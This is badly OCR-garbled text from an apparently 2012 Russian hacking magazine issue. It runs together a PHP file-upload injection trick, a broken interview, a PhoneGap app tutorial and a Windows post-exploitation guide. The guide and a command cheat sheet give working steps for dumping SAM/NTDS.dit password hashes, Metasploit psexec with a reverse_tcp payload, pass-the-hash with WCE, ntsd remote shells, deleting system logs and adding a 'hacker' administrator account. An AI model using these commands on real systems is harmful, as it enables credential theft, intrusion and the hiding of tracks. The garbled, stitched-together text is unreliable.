Content-Type : multipart/form-data; boundary=

01 /156/2012

-. Uni-

027

COVERSTORY
-

. Windows-aax n
.

.
.

$_ FILES.
Qwaza d o t.og .

cfo rm action= "upload.php" method= "POST"


enctype= "multipart/form-data" >
ci nput type= "Hidden" name= "AX_FILE_SIZE"
value= "leeeeeee" >
<input type= "file" name= "file[tmp_name][" >
cinp ut type= "file" name= "file[size][" >
<input type= "file" name= "file[name][" >

BlackFan, , ,
.
. , ,

ci nput type= "submit" value= "submit" >


</form>

- $_FILES :

foreach ($_FILES[ "file" ][ "tmp_name" ] as $key => $name)


{
echo "Size:" .$_FILES[ "file" ][ "size" ][$key]. "cbr/>\r\n" ;
echo "tmp name: " .
$_FILES[ "file" ][ "tmp_name" ][$key]. "cbr/>\r\n" ;

$_FILES[ "file" ][ "tmp_name" ][ "[name" ]


n :

$_FILES[ "file" ][ "tmp_name" ][$key]


i f ($_FILES[ "file" ][ "size" ][$key] >0 &&
$_FILES[ "file" ][ "size" ][$key] <1024)

echo "Ok<br/>\r\n" ;
copy($_FILES[ " file" ][ " tmp_name" ][$key], 'test-txt' );

$_FILES ( ,
) .
, .


( upload.php),

}
}

L-, secet.
,

php, , upload .php,

1.

secret.php,

(, , <?php ?>).
~-::

class

'li~t./SocJr:~t/i!lt:ta.php' ;

St.reaa_Filter_iarr.socJtet

2. , <<1 >> .
<< 1 .

extud8: ._,_.er_tilter

(
t

PIUVJISG - :
J. ;

t. UOict

,
:

prot.ect.ec1. $tiarta:
proucted

$ht~;1 ;

protected. faock 1;

$_FILES[ "file" ][ "size" ][$key] >0


"' @pat:u z:~sourc~ $ in


"' Qpara~~. te:soutce liout
Qparaa int ''consuae:d
Qparu bool liclo:sinq
Breturn int
'1
.P*Jit: hllcti.oa tilter (Hn, $out, " consuud, $clos1nq)

<<f ile[tmp_ nameH secet.php,


- <<1. ,
test .txt.
secet . php, txt,

wld.le

( liUcket

streaa_uc.ket_uke_wteale ( Hn ))

, .

swi.td. f'this- node ) (

.....,

PRIVJISG:
1ith1s->t.io.z:t:a->sessaqe (ftha->chonnel ,
lt ::

'ucket->date );

, ,

Content-Type (, ) .
n ,

:. lt: : NOICI :

defa.lt :
lithis -> tiarra->nouce:l!essaqe ( lit.hi.s-><:h~l .

liucke:t->da.ta l:

test .txt. !

"....,

<<
licon:sua!:d -

Sbuc.t:et- >do.t..a.le:n;

streaa_ucket_app~d ( ,out,

'uctet);

move_uploaded_file .

. (, ,
, )-

/"
r:il r i nitiali:r:e:r

imageceatefom*/image *.

@retum bool

, , ,

'1
.-uc h8ctioa o.c:reu.e ()

. ,

(1sset( lit.his->par;8:a5{ 'socket' ))) (


lisock ~ m.aa~ ~this->parus [ 'sock~t' ];

( 1.ss~ t( Hh1s->paraas { 'chann~l' ]))

HJus- >channe.l -

$img = imagecreatefromjpeg($_FILES[ "filename" ][ "tmp_name" ]) ;


imagejpeg($img, "uploads/" .$_FILES[ "filename" ][ "name" ]);

~thls->poru.s { ' chann~l'

);

JPEG,
U

( 1.ss~ t(~th1s->par~ [
Sth1s->ted~

aobl' JI) (

Sth1s->a raas r 'aod~'

1:

IF- .
, -

onCeat e n

028

. , ,

01 /156/20 12

. ,
,
.

, imageceatefom*
,
, l

, .,

2009 ,

, . ,

, G-

base64_ecode ,

<< >> !!, <<. >> <<[ >> !

, , :

!.

$jpegimage = imagecreatefromjpeg(
"data://image/jpeg;base64J" . base64_encode(

. , L

isql_result_array( 'imagedat~]));

imagejpeg($jpegimage);
,

, .
,
,

<form action=>
<input name= "goodvar .(" >
<input name= "goodarray(foo)" >
<input name= "badvar[ [" >
<input type=submit>
</form>

. ,
,

index.php :

, -,
,
, ,

<?php
print_r($_GET);
?>

imageceatefom*/image*, :
:

foreach ($_FILES[ "file" )_( "tmp_ name" ]_E.L$key => $name) {


echo "Size:" . $_FILES[ "file" ][ "size" ]($key]. "<br}>\r\n" ;
echo " tmp name:" .$_FILES[ "file" ) [ "t>_name" ]($key]. "<br/>\r\n" ;
$img = imagecreatefromjpeg(
$_FILES [ "file" ] [ "tmJJ_name" ] [$key]);
imagejpeg($img, ' ./new_' .$ke:,<. '_,jpg' );
ImageDestroy($img);

Array
(
[goodvar_] =>
[goodarray] => Array
(
(foo) =>

}
(badvar _ _ ] =>
l.jpg ,
, ,
S- Contet-Ty pe:

php ~//filter/read%3dconvert.lightning_template_filter /

Array
(
(goodvar_] =>
(goodarray) => Array
(
[foo] =>

reso_urce%3d
data://text/plain%3bbase64,eyUgaWYgcHJpbnRfcihpbmlfZ2V0X2
FsbCgpKSAlfQ
,
! , ,

, imageceatefomjpeg .

(badvar_ . [] =>

,
,
.

, .

$_FILES,
.

# 54939 file path injedion

Y~.tlity

Sunlitted: 201 1 -52113: 58U

FI'OO'I:I:korowkzlt gnaldotc:om

status:Ciowi
PP\IeniOrl : 5.3.6

ln RfC1867 file

~ fllen'le

dd: 2011--13

21 :48 UfC

Mllgned:~
P4dl.age: ~

OS:rnlevtt
CVE-IO:Zilli..:.ZZOZ

, .
, - ,
n

01 / 156/ 201 2

, , . ::

029

COVERSTORY

S,

&

. .

- : n:
~~ n.

E\comsoft.

ona:~vanced eBook ss,


n_~1 ,

- Defcon .

r.t

.... ,
IT, , ?
il !

~ . .- . ][J,
, 6. -

100 .

20


. ,
- ... , ,
- ,
. -
.


.
,

- ,
. ,
, - ...

<< ,
.
, , . <<>>

<<

4,5
6 .

91- .
,
,- .
,
. - , .

COVERSTORY
, ,

Elcomsoft,

, , ,

. ,

. , ,

, . :

, :

<<, >>.

, ,

. n

. -

, .

... .

r.1

APPLE

.:;.t ,
,

, ,

r.1

, .

.:;.t ELCOMSOF

ADOBE

?
l ,

l ,

~ ,

compute foesics.

, ,

~ ,

passwod v, ,

- ,

. , ,

, ...

Apple

. , ,

, .

, .

, ,

Recovey . -

[ 97- !

. ,

compute

Active

EFS

diectoy.

r.1

. . . PDF
ELCOMSOF ... ?

foesics . ,

pdf .
~

, ,

. : << , ,

>>.

IT.

80 %.

l ,

. ,
.

,
,

r.1

.:;.t ADVANCED
PROCESSOR,

, -

2001

DEFCON?

l , . ,

~ ,
<<

>>.

. :1

df-, .

, Defco

2001

, - .

1 ,

2001

~ ,

, - .

- .

, .

, ,

. ,

, <<

. 90-

, .

>>. , ,

- ,

Defco.

, ,

, .

, ,

, ,

ELCOMSOFT.

r,1

Elcomsoft,

12

20

Adobe.

, <<

Def co ,

.:;.t >> .

Advaced

1 .

1 , , , ...

. ,

~
Access, . ,
... .

~ ,

, ,

, ,

Apple, iOS [ ,
iPhoe 45 iPad21.

. -

, .

, -

, ,

032

eBook

ss,

? :1

01 /156/2012

. ,
.
- , .

, , ,
,
, .
- .

r.1

1.;.1 ? <<
>> ?

l _ .

~ ,
,

21

.
,

11

-,
,

.
,
. -
, ,

, ... ,

. :) ,

, - .
,

. ,
,
.

- .
, - ...

, .

r.1

l , ... ,

, ,

1.;.1 ADOBE

. ,

, .

- Spot the fed ! ).

. ,

l , , -,

, , .

~ Adobe

!, ),

. <<>> -

Adobe,

Adobe

, -

-.

, , .

, : <<,

<<>>. ,

, , >> .

, ,

- ,

: <<n>>,

. ,

, ,

, , ,

-,

, .

11

. .

, -

r.1

, .

, ,

Elcomsoft.

1.;.1

, ,

<<

, , .

<<n

>> .

, ,

. .

. :

, ,

l ~

<<, >>. ,

~ ,

, .

- <<>>.

01 /156/2012

033

COVERSTORY
, .

? ,

, .

- ?


n. ,

, , , ,

l .

. ,

~ .

. ,

, .

, -

Hackes Oevelopes

>> >> .

, .

r.1

. . . ?
l , l -)

~ 50
, Elcomsoft.

Laten,

Kit,

Canon

n ,

.
CONFidece

, ,

Magic

r.1

~-

2.0.

Niko

. lus-)

, .

. . . , ?

, .

, . ,

.
,

l ,

, . .

. .

, -

, .

r.1

6 ,

2001

2002

. ,

5-10

. . . ,
,


. ,

Nikon

r.1

. . .
.

l ,

~ , Pactical

! ),

cyptogaphy

l , ...

. , ,

, ,

~ . ,

. ... ,

, , -

, .

depositio

! ) -

. , .
, , .

. ,
: -

?>>.

r.1
. . . ?

, .

, :

Elcomsoft

, ,

, , ,

2001

...

l , .

~ ,

. ,

- ,

r.1

, ,

. . . 2002.

, . ,

r.1

, , ,

Elcomsoft
~ ,

CONFIOENCE 2.0
. . .
CANON.

Puic

lteest l. ,

1 %

. ,

l ,

. ,

~ I) .

- : n

. ,

>>.

. .

, n

, ,

, ,

Elcomsoft

17

3000, ,
3500.

, ,
. n

300,

IT,

,
. :::

01 /156/2012

Preview

30 .
.

11,

n n
n n

: n ~ n
~n ~ n

.
. n

n
.
n n
n n, n

Lotus Domino

Contolle n n
.
n, n,
n I

PCZONE

36

HTML5

A nd oid

n n,

? n.

- .

n n

, n

n .

n .

iOS,

MALWARE

500 n,
. n
n .

01/156/2012

DUQU

n
,
n n n

Stuxnet.

I!
,

MBR,

n,

5 nn
.

035

PCZONE

PhoneGap:o

HTML5

- ,

,
.

iOS,

todo list

Windows 8,

, , , n

HTML5.

n, .
, n n
n n

Adroid

, -

, - , n

CSS!,

PhoneGap. n

HTML, JavaSc i pt

n n nn n:

Windows Phone,

lk,

WebOS,

Symian

iOS, Andoid,
Bada.

n n n

. , n

Objective-C

Java

PhoneGap.

[n, Objective-C iOS), API


n n,-

PhoneGap API.

HTML5

L-, << >> , !

API

n n

, n n n

: , n, [
), n , ,
! ) , . .
,

._.....

-~ --

---

...........

- .
n jQuey Moile Secha,
,

[ n ) .
n , n

, n n n .
- .

iOS- -,

AppStoe, n

:). : ,

036

iOS

, , , Andoid. ,
n ,

01/156/20 12

PhoneGap: HTML5


, jQuey Moile.
JS-

n [ n

l n . ,
,
! JQue y Moile

[jqueymoile.com/download l n n
n, :

images/ [n n
jq-moilel;

index.css;
index.html;
index .js;
jquey.js;

jquey.moile.min.css;
jquey.moile . min.js.

,
. n
index.html.
, <<
>> << >>.

cdiv data-role= "page" data-dom-cache= "true"


class = "page- map" id= "index" >
cdiv data-role= "header" >
hl > n / hl >

href= "#points" class= "ui-btn-right" id= "menu-points"

data-transition= "pop" > To c/a>

c/ div >
cdiv data-role= "content" >
cdiv id= "map-canvas" >
! -- -->

, .

iOS .

c/ div>
c/div>
c/div>
data-dom-cache="true" ,

n n << n ,

. <<>>

n, : <<

data-transition="pop", << n >>

, . AppStoe

<< n >>. ,

, n >> ,

jQuey Moi l e, [ it.ly/vtXXM I .

n . ,
n. ,
n n
.
, ,

PHONEGAP

. :
n -n , n
, PhoneGap n iOS.

PhoneGap

n , n n

<< >> . !

J S- jQuey jQue y Mobile [ jqueymobile . com l,

PhoneGap Build [build .phonegap.com l n .

- Google Maps v.

: n .

. ,

, n

, .

[ << >>!. ,

- <<

>>

API.

. lgithub.com/

phonegap/phonegap-p luginsl,
iPhone, Android, Palm, Bla ckBerry. iOS
20 r: BarcodeScann er [ -!. AdPIugi [ iAdl, Nati veCont rol s l iOS

locaiStoage .

l .

<< >>, -
<< >>. n,

01 /156/2012

PhoneGap ,

037

PCZONE
EnableViewportScale
Externa!Hosts

n :

ltemO
ltem 1

cdiv data-role= "page" data-dom-cache="true"


class="page-pints" id= "points" >
cdiv data-role= "header" >
<!--

ltem 2
ltem 3
MediaPiaybackRequiresUserAction

-->

href= "#" data-theme="b" data-icon= "delete"

Boolean

00 Array

id= "delete-all" >Ya </>

String
String
String

..

NO

(41tems)
csi .gstatic.com

.googleapis.com
maps.goog le.com

String
Boolean

maps.gstatic.com
NO

ExternaiHosts

chl>Toc/hl>

//
self.addPoint(event. latlng,
self.options.radius, message);
self.updatePointslist(); // q

</>

});

</div>

}, false );

<!--n

-->

href="#index" class= "ui-btn-right"


data-transition="pop" data-direction= "reverse" >

n - .

cdiv>
<!-- -->

n n n

cul id="list" data-role="listview"


data-inset= "true" data-split-icon= "delete" >
</ul>
</div>
c/div>

. nn

if (navigator.geolocation) {

/1

n <<>> nn data-tansition=>>pop>>,

data-diection=>>evese>>,
<<>> <<>>.
nn . , .

API Google Maps,

Geolocation AP I

!, n n l:

function gpsSuccess(pos) {
var lat, lng;
if (pos.coords) {
lat
pos.coords.latitude;
lng
pos.coords.longitude;
el se
pos.latitude;
lat
lng
pos.longitude;

self.movePerson( new gm.Latlng(lat, lng));


var latlng = new gm.Latlng(
this .options.lat, this .options.lng);
t his .map = new gm.Map(element, {
zoom: this .options.zoom, //
center: latlng, //
mapTypeid: gm.MapTypeld.ROADMAP, //
disaleDoueClickZoom: true ,
/1 /
disaleOefaultUI: t ru e
/1

/1

/1

/1
window.setinterval( function () {

/1

n n

navigator.geolocation.getCurrentPosition(gpsSuccess,
$.noop, {
enaeHighAccuracy: true ,
maximumAge:

});

});

},

Maps.

Gm-

n,

Google

);

. - :

movePeson n n n

getPointslnBoundsll
t his .person = new gm.Marker({
map: t his .map,
icon: new gm.Markerlmage(PERSON_SPRITE_URL,
new gm.Size( 48 , 48 ))

n, n

- . n-
n ?

HTML5

locaiStoage, n !n
,

l. , n,

});

, !

PERSON_SPRITE_URL n n
Ggl - . - maps.gstatic.
com/mapfiles/c/mod scou t/cb scout spite api OO . png .

, n

, , n,

n . n

click:

- n - Safai Chome.
,

n <<n>> .

gm.event.addlistener(th is .map, 'click' , f unct i on (event)


self.requestMessage( function (err, message) {
11 , ut ,
i f (err) return ;

/1

n h ~ -n n -

038


, n , , n

WebKit . ~

01 / 156/ 2012

PhoneGap:

HTML5

. , , n

Run-
iPhone/iPad

PhoneGap.
index.html ,- . ,

n n,
n

www.

<<t folde

efeences f

any added

foldes.

, .

www.

PhoneGap.

PhoneGap

phonegap-1.2 .0.js

. <<

>>. 5uppoting

plist,

Fil es/PhoneGap.

E xtenai H osts ,

( Google
Mapsl: *gstatic.c om, *googleapis.com, maps.google.com.
,

. -

DOMReady

jQuey :

$1documentl.eadyll. PhoneGap deviceeady,


, .
:

document.addEventListener( "deviceready" , function () {


new Notificator( $( "#map-canvas" )[ ));

/1
11

if (navigator.network.connection.type
Connection.NONE) {

navigator.notification.alert( "He -" ,

iOS

$.noop,

. - (n Denwe

TILE);

}, false);

XAMPPI, ,
.

n , . ,

-. ,

. navigato. notification.alet

alet, ,

PhoneGap,

. ,

, netwo k .

i05-. ,

connection I it . ly/uEyRwz l I it.ly/tkvzE2 1.

PhoneGap

IDE

i05,
05 10.6+ (
05 10.61, Xcode
i05 50 . 50 , n
Apple . Xcode i05 50 l deve l ope.

document.add Eventlistener( "touchmove" , function (event) {


event.preventDefault();
} , false );

app l e . com/devcente/ i os/index.act i on l . ,

4 . , '
Apple (

alet confim ,
n

PhoneGap:

navigator.notification.confirm( 'Ya ?' ,

function (button_id) {

n , 5t,

!. ,

Objective-C.
PhoneGap,
PhoneGap i05.
lhttps://g ithub .com/callback/phonegap/zipba ll /1.2 .01,
i05 .
, Xcode PhoneGap.
i05

UI-

jQuery Moblle- ,

ile,

01/156/2012

PhoneGap

IDE

Zepto.js

[phonegap.com/tools l: 5encha Touch, lmpact, Dojo Mo-

039

PCZONE
i f (button_id === 1) { //
self.removePoint(point);

}
TILE );

},

, n,- , n
i.i n .

, n ln ,

l ,

56 .84484567007557 ...

Ph oneGap:

navigator.geolocation.watchPosition( function (positio n) {


self.movePerson( new gm.LatLng(
position.coords.latitude,
position.coords.longitude));
}, fu nction (error) {
navigator. notification.alert(
'code: + error.code + '\nmessage: ' + error.message,
$.noop,

56.84583899763894 ...

hG-n

TILE

);

}' {

frequency:

iOS

iOS,

! , nn

iOS

D eve l ope

Pogaml. n

});

n n

IAndoid,
-
, . n

Run

Windows Phonel

App le,

n . ,

, n n n n

- . n

$99

, n

n .

iS - ' nn n

n n . n n

n nn

iPad

n,

n .

:1.

n Stoe.

$99 n n ,

n - .

iPhone, iPod
Xcode.

iOS

Apple

: n n

nn n n iS -

! , n
n n : it .l y/tD6xA !I . ,
n
. .
?

n -n
n n n

PhoneGap,

n ,

PhoneGap.

iOS n
Objective-C,

n n

n n n , n

. .

API PhoneGap.

n n, n An d o id

Appcelerator Titanium

lwww . appceleato. com l.

Titanium
iPhone,

Andoid

Moile

n
n lk.

, n n

nium

IDE .

Tita-

n, n

$49 ].

$120 . l t
, n

Titanium
25

. n n n

Apache 2.

7,

n, n !
:
n n

lphonegap .co m/apps ].

n -

iOS An-


n , -

: $199 n $349

iOS

Andoid. n n

IDE

n , JavaScipt.

01.0

PhoneGap-

n n n
n. n
, n n,

HTML+JS

- n

n , n n

doid. . ,

Ph oneGap,

n,

OpenGL.

phonegap .

com/sta t l . n ,

. n

Corona SDK l www . anscamoile . com/coona l .

Windows

, - n

. ,

Ph one Gap

n Nitoi

n l n n GitHub: github .com/


,

phonegap l.

n n Ni toi n

Adobe .

, nn n n n n

? ::

01 / 156/2 01 2

. .

PCZONE

Ant

la.zhukov!Oreal.xakep.rul


WINDOWS-APOE


WINDOWS-CCTEM

, ,

?
, .
:

S-, LM/NTLM- xe
;

LSA, LM/NTLM-xe

, ;

, Sh-
,

! , ,
! .
, -.
:

, ,

PWDUMP
FGDUMP

NTLM.
.
.

. NTLM / LM-xe
.
, DLL-
SeDebugPivilege . ,

la NT AUTHORIY\SYSTEMI .
, :

! Live CDI, , -t lwww.piotrbaia . com/all/kon-boot l,


.

l NT AUTHORITY\
SYSTEM l ,
Ea syHack .
.

pwd ump lwww.foofus .net/-fizzgig/pwdump l fgdump lwww.


foofus .net/-fizzgig/fgdump l.
, .
:

pwdump localhost
fgdump . exe

127.0.0.1.PWDUMP

l ! 127.0.0.1 .CACHEDUMP
l ! .

01/156/2012

Widows-apoe

,
, .
, ,

pwdump,

> pwdump - mytarget . log -u MYDOMAIN \s omeuser


' lamepassword' 10 . 1.1.1
10.1.1 .1 -

, MYDOMAIN \

someuse- , la mepasswod-

, mytaget.log - .

pwdump, fgdump

> fgdump .exe -f hostfile . txt -u MYDOMAIN\someuser


1 >> -

hostfile.txt- ,

w n n n

pwdump

10

, <<-

! !.
,

fgdump.exe.

VOLUME SH AOOW

pwdump

n n n
Cedentials Edito (WCEI

Windows

vssown.vbs

SERVICE

fgdump

itools .l anmaste53 . co m /vss ow n . v bs l, .

, ,

. ,

SAM,

, . ,

cscript vssown. vbs /start.


cscript vssown.vbs /c reate.
: cscript vssown. vbs /list.

, -

Device object \\ ?\G LOBALROOT\


Device\HaddiskVolumeShadowCopy14 >> ! 14 -
!. .

. - ,

1.

, -

SYSTEM .

, ,
. , ,

\\?\GLOBALROOT \ Device\HarddiskVolume5hadowCopy14\
wi ndows\sys tem32 \ config \ SYSTEM .
\\?\GLOBALROOT \Device\HarddiskVolumeShadowCopy14\
windows\sys tem32 \co nfig \SAM .

, .
, >> ,

Volume Shadow Sevice ! ! .


Windows S v 2003.
, , System
Sta te ntbackup
IVolume Shadow f Shaed Folde s l .

2.

, -

SAM in side l i n si d ep o.com/us/saminsi d e.shtm l l


.

l ,

SAM SYSTEMI,

, ,
,
! ,

. ,

\\?\GLOBALROOT \ Device \ HarddiskVolume5hadowCopy14\


windows\ntds\ntds.dit .

Wi nd ows

SAM

SYSTEM. Active Di ecto y


NTDS.DIT, :

, ,

. , -

SYSTEM

NTDS.DIT,

SYSTEM.

n n ?

. _

, , n

LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\C uentVesion\


Winlogon\cachedlogonscount 0>>.

, .

csa b abata.com/down l oads/

01/156/2012

NTDS.DIT

, .

Csaba t ,
NTDS.DI T .

PCZONE
ntds dump has h.zip. ,

n n BackTack5 !n
Linu-],
n . ,
.

libesedb:

cd libesedb
chmod + configure
./configure && make

..- .....
...~""..."'

e su~_

. ..s.o

1000
1011.1:
lOM

<~ ...d ~

I ~

'"'"'""'"

11111111111111

<Di ..Od ~

."'...

<Di t>lod ~

<fmptp

O tntuo.,.

-----
f .. 5ae7te7 11tttlA...

O u<c

........

Z01?1..0."'6 1 D:IAIS , .

SAMiside
:

.
, :

cd esedbtools
. / esedbdumphash .. / .. /ntds .dit
/l ibe sedb/esedbtools/ntds.dit.expot/datatable.
. ,

SYSTEM:

cd .. / .. /creddump/
python ./dsdump.py .. /SYSTEM
. /libesedb/esedbtools/ntds.dit.export/datatale
! !

> sudo . /hashgrab2.py


HashGrab v2.e smyen
http: // InterNeT.net
Contact: RuSH4ck3R[at]gmail(dot]com
[*] Mounted /dev/sdal to /mnt/jomATB
[*] Mounted /dev/sdl to / mnt / AZwJU s
[*] Copying SAM and SYSTEM files ...
[ * ] Unmounting partitions . ..
[ * ] Deleting mount directories ..
[*] Deleting [ ' . / jomATB']
>$ ls
hashgrab2.py jomATB.txt
>$ cat . /jomATB.txt
Administrator : HASH
Guest:Sel:HASH

! ] .

smyen : leee:s

, :

HomeGroupUser$:1882:HASH

python . / dsdumphistory .

. . /system .. /libesedb/esedbtools/ntds.dit.export / datatale.


,

! ] .

'

HASHGRAB2+
SAMDUMP2

METASPLOIT

, .
tt.

, .

Metasploit

, ,

. :

Famewok

LiveCO !,
Offline NT Passwod & Registy Edi t o],

meterpreter > run post/windows/gather/hashdump

- ,
.

HashGab2l py 1 337 . get- oot . com / too l s/has h gab2 .


.!] samsump2 l soucefoge.net/pojec t s /ophcack/ f iles /
samdump2 / 2.0.1],

Liv- . HashGab2

Metasploit-

PsExec:

Windows-pae, , n

SAM

samdump2
SYSTEM .

meterpreter > use exploit/windows/smb /psexec


SAMinside
insidepro.comlrus/sami nside.shtml

lm2ntcrack

ighashgpu

www.xmco.fr/lm2ntcracklindex .html

www gol ubev.com/ hashgpu.htm

NL-.

. N

. , -

, L- .

, L- ,

- .

NT -

ighshgu

n.

. ,

GU

, LM-apo-ADMINISTRATOR,

Windows

, , ,

lm2tca c k .

MD4, MD5, SHA1, NTLM,


11g, MySQL5, MSSQL.

01 /156/2 01 2

Windows-napoe

meterpreter > set payload widows/meterpreter/reverse_tcp


meterpreter > set rhost ( ]
meterpreter > set smbpass (

~~-~

-' "'~O.I!ii l!i!

+ il

v - ~ """"'"'" oq~ r..

O t Jt

meterpreter
meterpreter
meterpreter
meterpreter

> set smbuser [ ]


> set lhost [ ]
> exploit
> shell -

ll3.PJI~

:I08Dt69'1D71iill:\117 ,,,

31D6CI'!IXIIW931

AI031RSI~
DlofSOC1(0lll~
. . 31151~ ..

, ,
. ,

. ,

getsystem .
MS09-012,
MS10-015 [KiTrapDDI .
,

NTLM

NTML w

! w !

WINDOWS
CREDENTIALS EDITOR

PASS-THE-HASH

Cain&Abel-

WCE

Pass-the-Hash Toolkit'a,

. -

:1. -

[ NTLM/LM-xe !:

1997

Pass The Hash,

Pass-the-Hash Toolkit. [oss.


coresecu rity.com/projects/pshtoolkit.htmll: IAM.EXE, WHOSTHERE.
GENHASH .EXE. , GENHASH
LM- N- . WHOSTHERE.

wce.exe -1

, -,

- - :


. ,

, :

, / NL- . IAM.

wce.exe -s <userame>:<domai >:< lmhash >:<thas h> \


- <program> .

- ,

[ , , . .l,

,
,

wce.exe -s

:579118C49145815C47ECD267657D3174
Iteret Explorer \ iexplore . exe"

user:Victim:1F27ACDE849935BBAADB435B51484EE

"c: \ Program Files \

NL-,
, << .

<<-S << user


Victim, LM- NTLM-xe <<->>

, .

whosthere.exe-

, . :1

iam.exe -h

administrator:mydomain:AAD384358514@4EEAADB

4358514@4EE:31DCFEeD16AE931873C59D7EeCe89Ce

, , .

, [, l
, , ,

CUDA-Multiforcer

www.cypto h aze.co m /multi fo c e. php

,
. :::

ophcrack

John the Ripper

pfi cr ck.so urceforg . net

www.openwall .cam

n Windows

iw-.

NL-,

Vidia.

-. jum

, ,

inw-. ,

diff',

[ win321 .

MD5, NTLM, MD4, SHA1,


MSSQL, SHA, MD5_PS: md5[$pass.$saltl, MD5_SP:
md5[$salt.$passl, SSHA: base64[sha1 [$pass.$saltll,
DOUBLEMD5: md5[md5[$passil, TRIPLEMD5, LM:
Microsoft LaMan hash .

01/156/2012

NTLM .


. , , Windows-ccee,
? . ,
? - ,
.

n n nwn

nn . n , ,

n n (

nmap, -

w),

ipconf ig /all

ipconfig /displaydns

D NS-e .

-~

/U-. - ,

netstat - nabo
netstat -s

............................................

, .

' etsta t - [ , UDP, ICMP, IPI.

[tcpludplicpmlip]

: ..

j netstat -
: route print

: .
'''''''f'

.,... ....

......................

..... .......

. ..................... . ..................... .

, ,

j netstat - 1 findstr :445

445.

net view

SMB [!.

net user %USERNAME% /domain

l. , ,

[ '/do m ai',
, . .

j net accounts

[ ! .

j.. ~.et ~.c~~.unts /do~~i ~............... .

net localgroup administrators

net localgroup administrators /domain

>> .

... ............................. ..... ................................ .

............ .

!. ".~t .~.~nfig ~o~.~~-t~ti~-~ ................. ,....

.. .. .

: net share
;,

....

S - .
R- .

. . . . ...... ... ....... ....... .... ... ... ........ ....... ......
: type %WINDIR%\System32\drivers\etc\
j hosts

NetBIOS, , , , . .

....... .... ... .... ............................ ......................... ... .................... .... ....................................................................... .

................ .........................

....
hosts.

. ....................................... ..

n enna - .

(n~~ :

n ( r ), ,
, , r nr . .

? .

whoami

'/all' 510 , 510 , !


whoami /all

? ! .

qwinsta

, , - . R- !
!, .
( uame !, , .

........... ... .... ... ................... ...... ...... ...

. ................

..................

- .

. ........................................... .

set

: . USERDOMAIN, USERNAME, USERPRO; FILE, , LOGONSERVER, COMPUTERNAME, APPDATA, ALLUSERPROFILE. .

systeminfo (XP+I

; , , ,
: , , .
~ , .

qprocess

~ ,

..... ................................

.. . .................

SET

. ~~~ ~

.... ............
~

....................................

schtasks /query /fo csv /v >

~..

10

PID

.. .... .... ....... ... ..... ... .. ... '...... . .............'............ ... . .........

. .........

............... ......... .......... ...... .. .. .. ....... . ..............

J. ..~~.~~~~.~.~~~ ..:~~~~.~., ~~.~~~~.~.~~~.:' .~.'.........................................................!


~ csv, .

%%

, , ,

. , SYSTEM ( Wi7x64l. , , - do_so methig.bat


SYSTEM 15:41 , :
at 15 : 41 / interactive "d:\pentest\do_somethig.bat"
, .

at

. ,............................................ ; ............................ .. .............. ..

~ , . at,

: schtasks (XP+I

.............. ,.: ..
net start

sc getkeyname ""
sc queryex ""

~~.~.~~.~.~~. ~~.~~~ ~~~~~.~~ .~~~~.~~~~~~.~~~~ .~~~.~~.~.~~~ .~.~~.~.~~~ ~ l~~.~~:.~.~.~.~. ~~~ ~ ~ 1................. ,.... .

sc query

PIO

key

..............................................................................................
j

tasklist (+)

.........................

taskkill [/f] /pid <pid>


taskkill [/f] /im <image_name>

......................... .

.... , .............

PIO

.......

! .~.~~.til~si n~~ .~r.i~eS. .................... .........~.~~.~.~~.~.~~.~:.ll\. ~ ~~~~ l~~.~.~~~~~.~~~ ~ ~:.~~~~..~:..~~ ~.~~~.~~~.~~~~~.: ............................................... .
: gpresult

/z

- .

................................... .................................................................. ....................................................................................... , ... ,............................................. ........... :


.-

nor. , noro. n ,
n .

, (, . . !.

wevtutil el

: wevtutil qe <LogName>

: ..

~~~~.~.~i~ c'..~.~~.~~.~.~.~~ ........ . ......

: del %WINDIR%\*.Iog / /s /q /f

.....

~~~~~~~ ~.~~~~~~' ~~~............ ............ ...... ................ ..... ................... ............... ............................................................... .
WINDOWS.

Windows - n n
no n n n. -

n - nn.

%windir%\System32\cmd .exe /
''%SystemRoot%\syst em32\Dism .
/online /get-features

, .

Windows Vista SP1/7/2008/2008R2, no , te lnet ft- ..

....................................................................
%windir%\System32\cmd.exe /
''%SystemRoot%\system32\Dism.
" /online /enaie-feature 1
featurename:TFTP

TFTP. F - tftp.exe

system32.

Windows

Vista

ntsd.exe,

Ntsd -server tcp :port=1337 cal.exe


Ntsd -remote tcp:server=<ip-

[ ), - .

apec>, port=1337

[ ). <<.shell>>,
.

NTSD

B ack d oo.

i .

net use

- , n

n. n: w

, , n,

(n, n n).

reg save HKLM\Security security.


hive

~ security . , , system.

.....................................................................................
..

'"

""

.. ...

.. .......

..

................................................... ..

!. .

~~~-~-~-~--~~-~-~-~~-~ ~--~--~.:~~~~ ........... ..~~--~-~- -~-~-~~~ -~-~~~~-~-~-~-~ - SAM, ~ .~~~~-~:.~~~~--~~ -~--~-~~-~~-~~~-~-~~~: ............................. .......... .......... .

add

[\\

9. ][\
maln

etiPaddr\] [Re Do] g


g

!: ,
[ TagetiPadd l.
<<R EG ADD HKLM\Sof tware\MyCo /v Data /t REG_BINAR Y /d f e340ead >> [ : Oata,
~ : REG_BINARY, : fe340eadl .

.. ...................... "...........

reg export [RegDomain]\[Key]


[FileName]
reg import [FileName]
reg query [\\TargetiPaddr\J [RegDomain]\[ ] /v [Valuename!]

........

................

~ n .
.

; n n .

, , .

w , , :

sam_backup.dat?

w, ,- , .

tree C:\/f /> C:\output_ of_tree.txt

dir \ /s / 1 find

/1

"search_string"

: , .

d i 1\1 1/sl
ba se 1/bl se a c h_s t i n g, .

, ,

- WMI (Windows Management lnterfacel.

CWMIC

, WI- (WMICI:
, , .

wmic baseboard get Manufacturer, Model, Product,


SeriaiNumber, Version

WMI

. , W I - lcompu t esyste m, bios, ,


, base b oadl n .
. .

wmic nicconfig get caption, macaddress, ipaddress,


DefaultiPGateway

: , - , I- ,
.

wmic nicconfig where "IPEnaed = 'TRUE ' and


DNSDomain 15 NOT NULL" get DefaultiPGateway,
DHCPServe r, DNSDomain , DNSHostName, DNS ServerSearchOrder, IPAddress, IPSubnet, MACAddress, WINSEnaeLMHostsLookup, WINSPrimaryServer, WINSSecondaryServer /format :li st

wmic printer get Caption, Default, Direct, Description, Local, Shared, Sharename, Status

n , .

wmic os get bootdevice, caption , csname, currenttimezone, installdate, servicepackmajorversion,


servicepackminorversion, systemdrive , version,
windowsdirectory /format:list

wmic product get Caption, lnstaiiDate, Vendor

wmic path win32_product where " name =


ware Update"' call Uninstal

'

Soft-

: Softwae Update.

, .


netuserhackerhacker/add

: net localgroup administrators /add hacker


. net localgroup administrators hacker /add
